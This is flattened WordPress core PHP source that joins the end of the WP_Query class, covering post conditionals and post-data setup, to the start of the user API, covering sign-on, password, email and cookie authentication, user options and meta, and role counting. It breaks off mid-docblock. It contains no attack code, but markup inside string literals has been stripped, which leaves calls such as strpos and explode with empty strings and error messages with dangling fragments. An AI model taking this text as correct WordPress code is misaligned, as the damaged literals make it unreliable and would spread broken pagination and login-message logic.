* * @return bool */ public function is_preview() { return (bool) $this->is_preview; } /** * Is the query for the robots file? * * @since 3.1.0 * * @return bool */ public function is_robots() { return (bool) $this->is_robots; } /** * Is the query for a search? * * @since 3.1.0 * * @return bool */ public function is_search() { return (bool) $this->is_search; } /** * Is the query for an existing single post? * * Works for any post type excluding pages. * * If the $post parameter is specified, this function will additionally * check if the query is for one of the Posts specified. * * @see WP_Query::is_page() * @see WP_Query::is_singular() * * @since 3.1.0 * * @param int|string|array $post Optional. Post ID, title, slug, path, or array of such. Default empty. * @return bool Whether the query is for an existing single post. */ public function is_single( $post = '' ) { if ( ! $this->is_single ) { return false; } if ( empty( $post ) ) { return true; } $post_obj = $this->get_queried_object(); $post = array_map( 'strval', (array) $post ); if ( in_array( (string) $post_obj->ID, $post ) ) { return true; } elseif ( in_array( $post_obj->post_title, $post ) ) { return true; } elseif ( in_array( $post_obj->post_name, $post ) ) { return true; } else { foreach ( $post as $postpath ) { if ( ! strpos( $postpath, '/' ) ) { continue; } $postpath_obj = get_page_by_path( $postpath, OBJECT, $post_obj->post_type ); if ( $postpath_obj && ( $postpath_obj->ID == $post_obj->ID ) ) { return true; } } } return false; } /** * Is the query for an existing single post of any post type (post, attachment, page, * custom post types)? * * If the $post_types parameter is specified, this function will additionally * check if the query is for one of the Posts Types specified. * * @see WP_Query::is_page() * @see WP_Query::is_single() * * @since 3.1.0 * * @param string|array $post_types Optional. Post type or array of post types. Default empty. * @return bool Whether the query is for an existing single post of any of the given post types. */ public function is_singular( $post_types = '' ) { if ( empty( $post_types ) || ! $this->is_singular ) { return (bool) $this->is_singular; } $post_obj = $this->get_queried_object(); return in_array( $post_obj->post_type, (array) $post_types ); } /** * Is the query for a specific time? * * @since 3.1.0 * * @return bool */ public function is_time() { return (bool) $this->is_time; } /** * Is the query for a trackback endpoint call? * * @since 3.1.0 * * @return bool */ public function is_trackback() { return (bool) $this->is_trackback; } /** * Is the query for an existing year archive? * * @since 3.1.0 * * @return bool */ public function is_year() { return (bool) $this->is_year; } /** * Is the query a 404 (returns no results)? * * @since 3.1.0 * * @return bool */ public function is_404() { return (bool) $this->is_404; } /** * Is the query for an embedded post? * * @since 4.4.0 * * @return bool */ public function is_embed() { return (bool) $this->is_embed; } /** * Is the query the main query? * * @since 3.3.0 * * @global WP_Query $wp_query Global WP_Query instance. * * @return bool */ public function is_main_query() { global $wp_the_query; return $wp_the_query === $this; } /** * Set up global post data. * * @since 4.1.0 * @since 4.4.0 Added the ability to pass a post ID to `$post`. * * @global int $id * @global WP_User $authordata * @global string|int|bool $currentday * @global string|int|bool $currentmonth * @global int $page * @global array $pages * @global int $multipage * @global int $more * @global int $numpages * * @param WP_Post|object|int $post WP_Post instance or Post ID/object. * @return true True when finished. */ public function setup_postdata( $post ) { global $id, $authordata, $currentday, $currentmonth, $page, $pages, $multipage, $more, $numpages; if ( ! ( $post instanceof WP_Post ) ) { $post = get_post( $post ); } if ( ! $post ) { return; } $elements = $this->generate_postdata( $post ); if ( false === $elements ) { return; } $id = $elements['id']; $authordata = $elements['authordata']; $currentday = $elements['currentday']; $currentmonth = $elements['currentmonth']; $page = $elements['page']; $pages = $elements['pages']; $multipage = $elements['multipage']; $more = $elements['more']; $numpages = $elements['numpages']; /** * Fires once the post data has been setup. * * @since 2.8.0 * @since 4.1.0 Introduced `$this` parameter. * * @param WP_Post $post The Post object (passed by reference). * @param WP_Query $this The current Query object (passed by reference). */ do_action_ref_array( 'the_post', array( &$post, &$this ) ); return true; } /** * Generate post data. * * @since 5.2.0 * * @param WP_Post|object|int $post WP_Post instance or Post ID/object. * @return array|bool $elements Elements of post or false on failure. */ public function generate_postdata( $post ) { if ( ! ( $post instanceof WP_Post ) ) { $post = get_post( $post ); } if ( ! $post ) { return false; } $id = (int) $post->ID; $authordata = get_userdata( $post->post_author ); $currentday = mysql2date( 'd.m.y', $post->post_date, false ); $currentmonth = mysql2date( 'm', $post->post_date, false ); $numpages = 1; $multipage = 0; $page = $this->get( 'page' ); if ( ! $page ) { $page = 1; } /* * Force full post content when viewing the permalink for the $post, * or when on an RSS feed. Otherwise respect the 'more' tag. */ if ( $post->ID === get_queried_object_id() && ( $this->is_page() || $this->is_single() ) ) { $more = 1; } elseif ( $this->is_feed() ) { $more = 1; } else { $more = 0; } $content = $post->post_content; if ( false !== strpos( $content, '' ) ) { $content = str_replace( "\n\n", '', $content ); $content = str_replace( "\n", '', $content ); $content = str_replace( "\n", '', $content ); // Remove the nextpage block delimiters, to avoid invalid block structures in the split content. $content = str_replace( '', '', $content ); $content = str_replace( '', '', $content ); // Ignore nextpage at the beginning of the content. if ( 0 === strpos( $content, '' ) ) { $content = substr( $content, 15 ); } $pages = explode( '', $content ); } else { $pages = array( $post->post_content ); } /** * Filters the "pages" derived from splitting the post content. * * "Pages" are determined by splitting the post content based on the presence * of `` tags. * * @since 4.4.0 * * @param string[] $pages Array of "pages" from the post content split by `` tags. * @param WP_Post $post Current post object. */ $pages = apply_filters( 'content_pagination', $pages, $post ); $numpages = count( $pages ); if ( $numpages > 1 ) { if ( $page > 1 ) { $more = 1; } $multipage = 1; } else { $multipage = 0; } $elements = compact( 'id', 'authordata', 'currentday', 'currentmonth', 'page', 'pages', 'multipage', 'more', 'numpages' ); return $elements; } /** * After looping through a nested query, this function * restores the $post global to the current post in this query. * * @since 3.7.0 * * @global WP_Post $post */ public function reset_postdata() { if ( ! empty( $this->post ) ) { $GLOBALS['post'] = $this->post; $this->setup_postdata( $this->post ); } } /** * Lazyload term meta for posts in the loop. * * @since 4.4.0 * @deprecated 4.5.0 See wp_queue_posts_for_term_meta_lazyload(). * * @param mixed $check * @param int $term_id * @return mixed */ public function lazyload_term_meta( $check, $term_id ) { _deprecated_function( __METHOD__, '4.5.0' ); return $check; } /** * Lazyload comment meta for comments in the loop. * * @since 4.4.0 * @deprecated 4.5.0 See wp_queue_comments_for_comment_meta_lazyload(). * * @param mixed $check * @param int $comment_id * @return mixed */ public function lazyload_comment_meta( $check, $comment_id ) { _deprecated_function( __METHOD__, '4.5.0' ); return $check; } } /** * Core User API * * @package WordPress * @subpackage Users */ /** * Authenticates and logs a user in with 'remember' capability. * * The credentials is an array that has 'user_login', 'user_password', and * 'remember' indices. If the credentials is not given, then the log in form * will be assumed and used if set. * * The various authentication cookies will be set by this function and will be * set for a longer period depending on if the 'remember' credential is set to * true. * * Note: wp_signon() doesn't handle setting the current user. This means that if the * function is called before the {@see 'init'} hook is fired, is_user_logged_in() will * evaluate as false until that point. If is_user_logged_in() is needed in conjunction * with wp_signon(), wp_set_current_user() should be called explicitly. * * @since 2.5.0 * * @global string $auth_secure_cookie * * @param array $credentials Optional. User info in order to sign on. * @param string|bool $secure_cookie Optional. Whether to use secure cookie. * @return WP_User|WP_Error WP_User on success, WP_Error on failure. */ function wp_signon( $credentials = array(), $secure_cookie = '' ) { if ( empty( $credentials ) ) { $credentials = array(); // Back-compat for plugins passing an empty string. if ( ! empty( $_POST['log'] ) ) { $credentials['user_login'] = $_POST['log']; } if ( ! empty( $_POST['pwd'] ) ) { $credentials['user_password'] = $_POST['pwd']; } if ( ! empty( $_POST['rememberme'] ) ) { $credentials['remember'] = $_POST['rememberme']; } } if ( ! empty( $credentials['remember'] ) ) { $credentials['remember'] = true; } else { $credentials['remember'] = false; } /** * Fires before the user is authenticated. * * The variables passed to the callbacks are passed by reference, * and can be modified by callback functions. * * @since 1.5.1 * * @todo Decide whether to deprecate the wp_authenticate action. * * @param string $user_login Username (passed by reference). * @param string $user_password User password (passed by reference). */ do_action_ref_array( 'wp_authenticate', array( &$credentials['user_login'], &$credentials['user_password'] ) ); if ( '' === $secure_cookie ) { $secure_cookie = is_ssl(); } /** * Filters whether to use a secure sign-on cookie. * * @since 3.1.0 * * @param bool $secure_cookie Whether to use a secure sign-on cookie. * @param array $credentials { * Array of entered sign-on data. * * @type string $user_login Username. * @type string $user_password Password entered. * @type bool $remember Whether to 'remember' the user. Increases the time * that the cookie will be kept. Default false. * } */ $secure_cookie = apply_filters( 'secure_signon_cookie', $secure_cookie, $credentials ); global $auth_secure_cookie; // XXX ugly hack to pass this to wp_authenticate_cookie $auth_secure_cookie = $secure_cookie; add_filter( 'authenticate', 'wp_authenticate_cookie', 30, 3 ); $user = wp_authenticate( $credentials['user_login'], $credentials['user_password'] ); if ( is_wp_error( $user ) ) { return $user; } wp_set_auth_cookie( $user->ID, $credentials['remember'], $secure_cookie ); /** * Fires after the user has successfully logged in. * * @since 1.5.0 * * @param string $user_login Username. * @param WP_User $user WP_User object of the logged-in user. */ do_action( 'wp_login', $user->user_login, $user ); return $user; } /** * Authenticate a user, confirming the username and password are valid. * * @since 2.8.0 * * @param WP_User|WP_Error|null $user WP_User or WP_Error object from a previous callback. Default null. * @param string $username Username for authentication. * @param string $password Password for authentication. * @return WP_User|WP_Error WP_User on success, WP_Error on failure. */ function wp_authenticate_username_password( $user, $username, $password ) { if ( $user instanceof WP_User ) { return $user; } if ( empty( $username ) || empty( $password ) ) { if ( is_wp_error( $user ) ) { return $user; } $error = new WP_Error(); if ( empty( $username ) ) { $error->add( 'empty_username', __( 'ERROR: The username field is empty.' ) ); } if ( empty( $password ) ) { $error->add( 'empty_password', __( 'ERROR: The password field is empty.' ) ); } return $error; } $user = get_user_by( 'login', $username ); if ( ! $user ) { return new WP_Error( 'invalid_username', __( 'ERROR: Invalid username.' ) . ' ' . __( 'Lost your password?' ) . '' ); } /** * Filters whether the given user can be authenticated with the provided $password. * * @since 2.5.0 * * @param WP_User|WP_Error $user WP_User or WP_Error object if a previous * callback failed authentication. * @param string $password Password to check against the user. */ $user = apply_filters( 'wp_authenticate_user', $user, $password ); if ( is_wp_error( $user ) ) { return $user; } if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) { return new WP_Error( 'incorrect_password', sprintf( /* translators: %s: user name */ __( 'ERROR: The password you entered for the username %s is incorrect.' ), '' . $username . '' ) . ' ' . __( 'Lost your password?' ) . '' ); } return $user; } /** * Authenticates a user using the email and password. * * @since 4.5.0 * * @param WP_User|WP_Error|null $user WP_User or WP_Error object if a previous * callback failed authentication. * @param string $email Email address for authentication. * @param string $password Password for authentication. * @return WP_User|WP_Error WP_User on success, WP_Error on failure. */ function wp_authenticate_email_password( $user, $email, $password ) { if ( $user instanceof WP_User ) { return $user; } if ( empty( $email ) || empty( $password ) ) { if ( is_wp_error( $user ) ) { return $user; } $error = new WP_Error(); if ( empty( $email ) ) { $error->add( 'empty_username', __( 'ERROR: The email field is empty.' ) ); // Uses 'empty_username' for back-compat with wp_signon() } if ( empty( $password ) ) { $error->add( 'empty_password', __( 'ERROR: The password field is empty.' ) ); } return $error; } if ( ! is_email( $email ) ) { return $user; } $user = get_user_by( 'email', $email ); if ( ! $user ) { return new WP_Error( 'invalid_email', __( 'ERROR: Invalid email address.' ) . ' ' . __( 'Lost your password?' ) . '' ); } /** This filter is documented in wp-includes/user.php */ $user = apply_filters( 'wp_authenticate_user', $user, $password ); if ( is_wp_error( $user ) ) { return $user; } if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) { return new WP_Error( 'incorrect_password', sprintf( /* translators: %s: email address */ __( 'ERROR: The password you entered for the email address %s is incorrect.' ), '' . $email . '' ) . ' ' . __( 'Lost your password?' ) . '' ); } return $user; } /** * Authenticate the user using the WordPress auth cookie. * * @since 2.8.0 * * @global string $auth_secure_cookie * * @param WP_User|WP_Error|null $user WP_User or WP_Error object from a previous callback. Default null. * @param string $username Username. If not empty, cancels the cookie authentication. * @param string $password Password. If not empty, cancels the cookie authentication. * @return WP_User|WP_Error WP_User on success, WP_Error on failure. */ function wp_authenticate_cookie( $user, $username, $password ) { if ( $user instanceof WP_User ) { return $user; } if ( empty( $username ) && empty( $password ) ) { $user_id = wp_validate_auth_cookie(); if ( $user_id ) { return new WP_User( $user_id ); } global $auth_secure_cookie; if ( $auth_secure_cookie ) { $auth_cookie = SECURE_AUTH_COOKIE; } else { $auth_cookie = AUTH_COOKIE; } if ( ! empty( $_COOKIE[ $auth_cookie ] ) ) { return new WP_Error( 'expired_session', __( 'Please log in again.' ) ); } // If the cookie is not set, be silent. } return $user; } /** * For Multisite blogs, check if the authenticated user has been marked as a * spammer, or if the user's primary blog has been marked as spam. * * @since 3.7.0 * * @param WP_User|WP_Error|null $user WP_User or WP_Error object from a previous callback. Default null. * @return WP_User|WP_Error WP_User on success, WP_Error if the user is considered a spammer. */ function wp_authenticate_spam_check( $user ) { if ( $user instanceof WP_User && is_multisite() ) { /** * Filters whether the user has been marked as a spammer. * * @since 3.7.0 * * @param bool $spammed Whether the user is considered a spammer. * @param WP_User $user User to check against. */ $spammed = apply_filters( 'check_is_user_spammed', is_user_spammy( $user ), $user ); if ( $spammed ) { return new WP_Error( 'spammer_account', __( 'ERROR: Your account has been marked as a spammer.' ) ); } } return $user; } /** * Validates the logged-in cookie. * * Checks the logged-in cookie if the previous auth cookie could not be * validated and parsed. * * This is a callback for the {@see 'determine_current_user'} filter, rather than API. * * @since 3.9.0 * * @param int|bool $user_id The user ID (or false) as received from the * determine_current_user filter. * @return int|false User ID if validated, false otherwise. If a user ID from * an earlier filter callback is received, that value is returned. */ function wp_validate_logged_in_cookie( $user_id ) { if ( $user_id ) { return $user_id; } if ( is_blog_admin() || is_network_admin() || empty( $_COOKIE[ LOGGED_IN_COOKIE ] ) ) { return false; } return wp_validate_auth_cookie( $_COOKIE[ LOGGED_IN_COOKIE ], 'logged_in' ); } /** * Number of posts user has written. * * @since 3.0.0 * @since 4.1.0 Added `$post_type` argument. * @since 4.3.0 Added `$public_only` argument. Added the ability to pass an array * of post types to `$post_type`. * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $userid User ID. * @param array|string $post_type Optional. Single post type or array of post types to count the number of posts for. Default 'post'. * @param bool $public_only Optional. Whether to only return counts for public posts. Default false. * @return string Number of posts the user has written in this post type. */ function count_user_posts( $userid, $post_type = 'post', $public_only = false ) { global $wpdb; $where = get_posts_by_author_sql( $post_type, true, $userid, $public_only ); $count = $wpdb->get_var( "SELECT COUNT(*) FROM $wpdb->posts $where" ); /** * Filters the number of posts a user has written. * * @since 2.7.0 * @since 4.1.0 Added `$post_type` argument. * @since 4.3.1 Added `$public_only` argument. * * @param int $count The user's post count. * @param int $userid User ID. * @param string|array $post_type Single post type or array of post types to count the number of posts for. * @param bool $public_only Whether to limit counted posts to public posts. */ return apply_filters( 'get_usernumposts', $count, $userid, $post_type, $public_only ); } /** * Number of posts written by a list of users. * * @since 3.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param array $users Array of user IDs. * @param string|array $post_type Optional. Single post type or array of post types to check. Defaults to 'post'. * @param bool $public_only Optional. Only return counts for public posts. Defaults to false. * @return array Amount of posts each user has written. */ function count_many_users_posts( $users, $post_type = 'post', $public_only = false ) { global $wpdb; $count = array(); if ( empty( $users ) || ! is_array( $users ) ) { return $count; } $userlist = implode( ',', array_map( 'absint', $users ) ); $where = get_posts_by_author_sql( $post_type, true, null, $public_only ); $result = $wpdb->get_results( "SELECT post_author, COUNT(*) FROM $wpdb->posts $where AND post_author IN ($userlist) GROUP BY post_author", ARRAY_N ); foreach ( $result as $row ) { $count[ $row[0] ] = $row[1]; } foreach ( $users as $id ) { if ( ! isset( $count[ $id ] ) ) { $count[ $id ] = 0; } } return $count; } // // User option functions // /** * Get the current user's ID * * @since MU (3.0.0) * * @return int The current user's ID, or 0 if no user is logged in. */ function get_current_user_id() { if ( ! function_exists( 'wp_get_current_user' ) ) { return 0; } $user = wp_get_current_user(); return ( isset( $user->ID ) ? (int) $user->ID : 0 ); } /** * Retrieve user option that can be either per Site or per Network. * * If the user ID is not given, then the current user will be used instead. If * the user ID is given, then the user data will be retrieved. The filter for * the result, will also pass the original option name and finally the user data * object as the third parameter. * * The option will first check for the per site name and then the per Network name. * * @since 2.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $option User option name. * @param int $user Optional. User ID. * @param string $deprecated Use get_option() to check for an option in the options table. * @return mixed User option value on success, false on failure. */ function get_user_option( $option, $user = 0, $deprecated = '' ) { global $wpdb; if ( ! empty( $deprecated ) ) { _deprecated_argument( __FUNCTION__, '3.0.0' ); } if ( empty( $user ) ) { $user = get_current_user_id(); } if ( ! $user = get_userdata( $user ) ) { return false; } $prefix = $wpdb->get_blog_prefix(); if ( $user->has_prop( $prefix . $option ) ) { // Blog specific $result = $user->get( $prefix . $option ); } elseif ( $user->has_prop( $option ) ) { // User specific and cross-blog $result = $user->get( $option ); } else { $result = false; } /** * Filters a specific user option value. * * The dynamic portion of the hook name, `$option`, refers to the user option name. * * @since 2.5.0 * * @param mixed $result Value for the user's option. * @param string $option Name of the option being retrieved. * @param WP_User $user WP_User object of the user whose option is being retrieved. */ return apply_filters( "get_user_option_{$option}", $result, $option, $user ); } /** * Update user option with global blog capability. * * User options are just like user metadata except that they have support for * global blog options. If the 'global' parameter is false, which it is by default * it will prepend the WordPress table prefix to the option name. * * Deletes the user option if $newvalue is empty. * * @since 2.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $user_id User ID. * @param string $option_name User option name. * @param mixed $newvalue User option value. * @param bool $global Optional. Whether option name is global or blog specific. * Default false (blog specific). * @return int|bool User meta ID if the option didn't exist, true on successful update, * false on failure. */ function update_user_option( $user_id, $option_name, $newvalue, $global = false ) { global $wpdb; if ( ! $global ) { $option_name = $wpdb->get_blog_prefix() . $option_name; } return update_user_meta( $user_id, $option_name, $newvalue ); } /** * Delete user option with global blog capability. * * User options are just like user metadata except that they have support for * global blog options. If the 'global' parameter is false, which it is by default * it will prepend the WordPress table prefix to the option name. * * @since 3.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $user_id User ID * @param string $option_name User option name. * @param bool $global Optional. Whether option name is global or blog specific. * Default false (blog specific). * @return bool True on success, false on failure. */ function delete_user_option( $user_id, $option_name, $global = false ) { global $wpdb; if ( ! $global ) { $option_name = $wpdb->get_blog_prefix() . $option_name; } return delete_user_meta( $user_id, $option_name ); } /** * Retrieve list of users matching criteria. * * @since 3.1.0 * * @see WP_User_Query * * @param array $args Optional. Arguments to retrieve users. See WP_User_Query::prepare_query(). * for more information on accepted arguments. * @return array List of users. */ function get_users( $args = array() ) { $args = wp_parse_args( $args ); $args['count_total'] = false; $user_search = new WP_User_Query( $args ); return (array) $user_search->get_results(); } /** * Get the sites a user belongs to. * * @since 3.0.0 * @since 4.7.0 Converted to use `get_sites()`. * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $user_id User ID * @param bool $all Whether to retrieve all sites, or only sites that are not * marked as deleted, archived, or spam. * @return array A list of the user's sites. An empty array if the user doesn't exist * or belongs to no sites. */ function get_blogs_of_user( $user_id, $all = false ) { global $wpdb; $user_id = (int) $user_id; // Logged out users can't have sites if ( empty( $user_id ) ) { return array(); } /** * Filters the list of a user's sites before it is populated. * * Passing a non-null value to the filter will effectively short circuit * get_blogs_of_user(), returning that value instead. * * @since 4.6.0 * * @param null|array $sites An array of site objects of which the user is a member. * @param int $user_id User ID. * @param bool $all Whether the returned array should contain all sites, including * those marked 'deleted', 'archived', or 'spam'. Default false. */ $sites = apply_filters( 'pre_get_blogs_of_user', null, $user_id, $all ); if ( null !== $sites ) { return $sites; } $keys = get_user_meta( $user_id ); if ( empty( $keys ) ) { return array(); } if ( ! is_multisite() ) { $site_id = get_current_blog_id(); $sites = array( $site_id => new stdClass ); $sites[ $site_id ]->userblog_id = $site_id; $sites[ $site_id ]->blogname = get_option( 'blogname' ); $sites[ $site_id ]->domain = ''; $sites[ $site_id ]->path = ''; $sites[ $site_id ]->site_id = 1; $sites[ $site_id ]->siteurl = get_option( 'siteurl' ); $sites[ $site_id ]->archived = 0; $sites[ $site_id ]->spam = 0; $sites[ $site_id ]->deleted = 0; return $sites; } $site_ids = array(); if ( isset( $keys[ $wpdb->base_prefix . 'capabilities' ] ) && defined( 'MULTISITE' ) ) { $site_ids[] = 1; unset( $keys[ $wpdb->base_prefix . 'capabilities' ] ); } $keys = array_keys( $keys ); foreach ( $keys as $key ) { if ( 'capabilities' !== substr( $key, -12 ) ) { continue; } if ( $wpdb->base_prefix && 0 !== strpos( $key, $wpdb->base_prefix ) ) { continue; } $site_id = str_replace( array( $wpdb->base_prefix, '_capabilities' ), '', $key ); if ( ! is_numeric( $site_id ) ) { continue; } $site_ids[] = (int) $site_id; } $sites = array(); if ( ! empty( $site_ids ) ) { $args = array( 'number' => '', 'site__in' => $site_ids, 'update_site_meta_cache' => false, ); if ( ! $all ) { $args['archived'] = 0; $args['spam'] = 0; $args['deleted'] = 0; } $_sites = get_sites( $args ); foreach ( $_sites as $site ) { $sites[ $site->id ] = (object) array( 'userblog_id' => $site->id, 'blogname' => $site->blogname, 'domain' => $site->domain, 'path' => $site->path, 'site_id' => $site->network_id, 'siteurl' => $site->siteurl, 'archived' => $site->archived, 'mature' => $site->mature, 'spam' => $site->spam, 'deleted' => $site->deleted, ); } } /** * Filters the list of sites a user belongs to. * * @since MU (3.0.0) * * @param array $sites An array of site objects belonging to the user. * @param int $user_id User ID. * @param bool $all Whether the returned sites array should contain all sites, including * those marked 'deleted', 'archived', or 'spam'. Default false. */ return apply_filters( 'get_blogs_of_user', $sites, $user_id, $all ); } /** * Find out whether a user is a member of a given blog. * * @since MU (3.0.0) * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $user_id Optional. The unique ID of the user. Defaults to the current user. * @param int $blog_id Optional. ID of the blog to check. Defaults to the current site. * @return bool */ function is_user_member_of_blog( $user_id = 0, $blog_id = 0 ) { global $wpdb; $user_id = (int) $user_id; $blog_id = (int) $blog_id; if ( empty( $user_id ) ) { $user_id = get_current_user_id(); } // Technically not needed, but does save calls to get_site and get_user_meta // in the event that the function is called when a user isn't logged in if ( empty( $user_id ) ) { return false; } else { $user = get_userdata( $user_id ); if ( ! $user instanceof WP_User ) { return false; } } if ( ! is_multisite() ) { return true; } if ( empty( $blog_id ) ) { $blog_id = get_current_blog_id(); } $blog = get_site( $blog_id ); if ( ! $blog || ! isset( $blog->domain ) || $blog->archived || $blog->spam || $blog->deleted ) { return false; } $keys = get_user_meta( $user_id ); if ( empty( $keys ) ) { return false; } // no underscore before capabilities in $base_capabilities_key $base_capabilities_key = $wpdb->base_prefix . 'capabilities'; $site_capabilities_key = $wpdb->base_prefix . $blog_id . '_capabilities'; if ( isset( $keys[ $base_capabilities_key ] ) && $blog_id == 1 ) { return true; } if ( isset( $keys[ $site_capabilities_key ] ) ) { return true; } return false; } /** * Adds meta data to a user. * * @since 3.0.0 * * @param int $user_id User ID. * @param string $meta_key Metadata name. * @param mixed $meta_value Metadata value. * @param bool $unique Optional. Whether the same key should not be added. Default false. * @return int|false Meta ID on success, false on failure. */ function add_user_meta( $user_id, $meta_key, $meta_value, $unique = false ) { return add_metadata( 'user', $user_id, $meta_key, $meta_value, $unique ); } /** * Remove metadata matching criteria from a user. * * You can match based on the key, or key and value. Removing based on key and * value, will keep from removing duplicate metadata with the same key. It also * allows removing all metadata matching key, if needed. * * @since 3.0.0 * @link https://codex.wordpress.org/Function_Reference/delete_user_meta * * @param int $user_id User ID * @param string $meta_key Metadata name. * @param mixed $meta_value Optional. Metadata value. * @return bool True on success, false on failure. */ function delete_user_meta( $user_id, $meta_key, $meta_value = '' ) { return delete_metadata( 'user', $user_id, $meta_key, $meta_value ); } /** * Retrieve user meta field for a user. * * @since 3.0.0 * @link https://codex.wordpress.org/Function_Reference/get_user_meta * * @param int $user_id User ID. * @param string $key Optional. The meta key to retrieve. By default, returns data for all keys. * @param bool $single Whether to return a single value. * @return mixed Will be an array if $single is false. Will be value of meta data field if $single is true. */ function get_user_meta( $user_id, $key = '', $single = false ) { return get_metadata( 'user', $user_id, $key, $single ); } /** * Update user meta field based on user ID. * * Use the $prev_value parameter to differentiate between meta fields with the * same key and user ID. * * If the meta field for the user does not exist, it will be added. * * @since 3.0.0 * @link https://codex.wordpress.org/Function_Reference/update_user_meta * * @param int $user_id User ID. * @param string $meta_key Metadata key. * @param mixed $meta_value Metadata value. * @param mixed $prev_value Optional. Previous value to check before removing. * @return int|bool Meta ID if the key didn't exist, true on successful update, false on failure. */ function update_user_meta( $user_id, $meta_key, $meta_value, $prev_value = '' ) { return update_metadata( 'user', $user_id, $meta_key, $meta_value, $prev_value ); } /** * Count number of users who have each of the user roles. * * Assumes there are neither duplicated nor orphaned capabilities meta_values. * Assumes role names are unique phrases. Same assumption made by WP_User_Query::prepare_query() * Using $strategy = 'time' this is CPU-intensive and should handle around 10^7 users. * Using $strategy = 'memory' this is memory-intensive and should handle around 10^5 users, but see WP Bug #12257. * * @since 3.0.0 * @since 4.4.0 The number of users with no role is now included in the `none` element. * @since 4.9.0 The `$site_id` parameter was added to support multisite. * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $strategy Optional. The computational strategy to use when counting the users. * Accepts either 'time' or 'memory'. Default 'time'. * @param int|null $site_id Optional. The site ID to count users for. Defaults to the current site. * @return array Includes a grand total and an array of counts indexed by role strings. */ function count_users( $strategy = 'time', $site_id = null ) { global $wpdb; // Initialize if ( ! $site_id ) { $site_id = get_current_blog_id(); } /** * Filter the user count before queries are run. Return a non-null value to cause count_users() * to return early. * * @since 5.1.0 * * @param null|string $result Default null. * @param string $strategy Optional. The computational strategy to use when counting the users. * Accepts either 'time' or 'memory'. Default 'time'. * @param int|null $site_id Optional. The site ID to count users for. Defaults to the current site. */ $pre = apply_filters( 'pre_count_users', null, $strategy, $site_id ); if ( null !== $pre ) { return $pre; } $blog_prefix = $wpdb->get_blog_prefix( $site_id ); $result = array(); if ( 'time' == $strategy ) { if ( is_multisite() && $site_id != get_current_blog_id() ) { switch_to_blog( $site_id ); $avail_roles = wp_roles()->get_names(); restore_current_blog(); } else { $avail_roles = wp_roles()->get_names(); } // Build a CPU-intensive query that will return concise information. $select_count = array(); foreach ( $avail_roles as $this_role => $name ) { $select_count[] = $wpdb->prepare( 'COUNT(NULLIF(`meta_value` LIKE %s, false))', '%' . $wpdb->esc_like( '"' . $this_role . '"' ) . '%' ); } $select_count[] = "COUNT(NULLIF(`meta_value` = 'a:0:{}', false))"; $select_count = implode( ', ', $select_count ); // Add the meta_value index to the selection list, then run the query. $row = $wpdb->get_row( " SELECT {$select_count}, COUNT(*) FROM {$wpdb->usermeta} INNER JOIN {$wpdb->users} ON user_id = ID WHERE meta_key = '{$blog_prefix}capabilities' ", ARRAY_N ); // Run the previous loop again to associate results with role names. $col = 0; $role_counts = array(); foreach ( $avail_roles as $this_role => $name ) { $count = (int) $row[ $col++ ]; if ( $count > 0 ) { $role_counts[ $this_role ] = $count; } } $role_counts['none'] = (int) $row[ $col++ ]; // Get the meta_value index from the end of the result set. $total_users = (int) $row[ $col ]; $result['total_users'] = $total_users; $result['avail_roles'] =& $role_counts; } else { $avail_roles = array( 'none' => 0, ); $users_of_blog = $wpdb->get_col( " SELECT meta_value FROM {$wpdb->usermeta} INNER JOIN {$wpdb->users} ON user_id = ID WHERE meta_key = '{$blog_prefix}capabilities' " ); foreach ( $users_of_blog as $caps_meta ) { $b_roles = maybe_unserialize( $caps_meta ); if ( ! is_array( $b_roles ) ) { continue; } if ( empty( $b_roles ) ) { $avail_roles['none']++; } foreach ( $b_roles as $b_role => $val ) { if ( isset( $avail_roles[ $b_role ] ) ) { $avail_roles[ $b_role ]++; } else { $avail_roles[ $b_role ] = 1; } } } $result['total_users'] = count( $users_of_blog ); $result['avail_roles'] =& $avail_roles; } return $result; } // // Private helper functions // /** * Set up global user vars. * * Used by wp_set_current_user() for back compat. Might be deprecated in the future. * * @since 2.0.4 * * @global string $user_login The user username for logging in * @global WP_User $userdata User data. * @global int $user_level The level of the user * @global int $user_ID The ID of the user * @global string $user_email The email address of the user * @global string $user_url The url in the user's profile * @global string $user_identity The display name of the user * * @param int $for_user_id Optional. User ID to set up global data. Default 0. */ function setup_userdata( $for_user_id = 0 ) { global $user_login, $userdata, $user_level, $user_ID, $user_email, $user_url, $user_identity; if ( ! $for_user_id ) { $for_user_id = get_current_user_id(); } $user = get_userdata( $for_user_id ); if ( ! $user ) { $user_ID = 0; $user_level = 0; $userdata = null; $user_login = $user_email = $user_url = $user_identity = ''; return; } $user_ID = (int) $user->ID; $user_level = (int) $user->user_level; $userdata = $user; $user_login = $user->user_login; $user_email = $user->user_email; $user_url = $user->user_url; $user_identity = $user->display_name; } /** * Create dropdown HTML content of users. * * The content can either be displayed, which it is by default or retrieved by * setting the 'echo' argument. The 'include' and 'exclude' arguments do not * need to be used; all users will be displayed in that case. Only one can be * used, either 'include' or 'exclude', but not both. * * The available arguments are as follows: * * @since 2.3.0 * @since 4.5.0 Added the 'display_name_with_login' value for 'show'. * @since 4.7.0 Added the `$role`, `$role__in`, and `$role__not_in` parameters. * * @param array|string $args { * Optional. Array or string of arguments to generate a drop-down of users. * See WP_User_Query::prepare_query() for additional available arguments. * * @type string $show_option_all Text to show as the drop-down default (all). * Default empty. * @type string $show_option_none Text to show as the drop-down default when no * users were found. Default empty. * @type int|string $option_none_value Value to use for $show_option_non when no users * were found. Default -1. * @type string $hide_if_only_one_author Whether to skip generating the drop-down * if only one user was found. Default empty. * @type string $orderby Field to order found users by. Accepts user fields. * Default 'display_name'. * @type string $order Whether to order users in ascending or descending * order. Accepts 'ASC' (ascending) or 'DESC' (descending). * Default 'ASC'. * @type array|string $include Array or comma-separated list of user IDs to include. * Default empty. * @type array|string $exclude Array or comma-separated list of user IDs to exclude. * Default empty. * @type bool|int $multi Whether to skip the ID attribute on the 'select' element. * Accepts 1|true or 0|false. Default 0|false. * @type string $show User data to display. If the selected item is empty * then the 'user_login' will be displayed in parentheses. * Accepts any user field, or 